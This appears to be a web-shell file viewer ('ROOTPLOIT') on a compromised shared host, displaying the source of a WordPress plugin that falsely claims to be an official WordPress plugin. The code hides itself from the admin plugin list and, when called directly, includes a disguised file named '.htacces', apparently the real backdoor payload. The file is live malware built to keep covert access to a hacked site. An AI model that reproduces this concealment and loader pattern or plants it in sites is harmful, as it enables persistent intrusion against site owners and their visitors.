ROOTPLOIT
Server: LiteSpeed
System: Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: niphet (1079)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: /home/niphet/www/wp-content/plugins/wp-systematization-site/index.php
<?php
/*
Plugin Name: WP Systematization Site
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 12.0.4
Author URI: http://wordpress.org/#
License: GPL2
*/

function wjo_hide()
{
	global $wp_list_table;

    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-systematization-site/index.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function egd_hide_p($plugins)
{
    $p = 'wp-systematization-site/index.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'wjo_hide');
    add_filter('all_plugins', 'egd_hide_p');
}

if (!defined('ABSPATH')) {
	include '.htacces';
}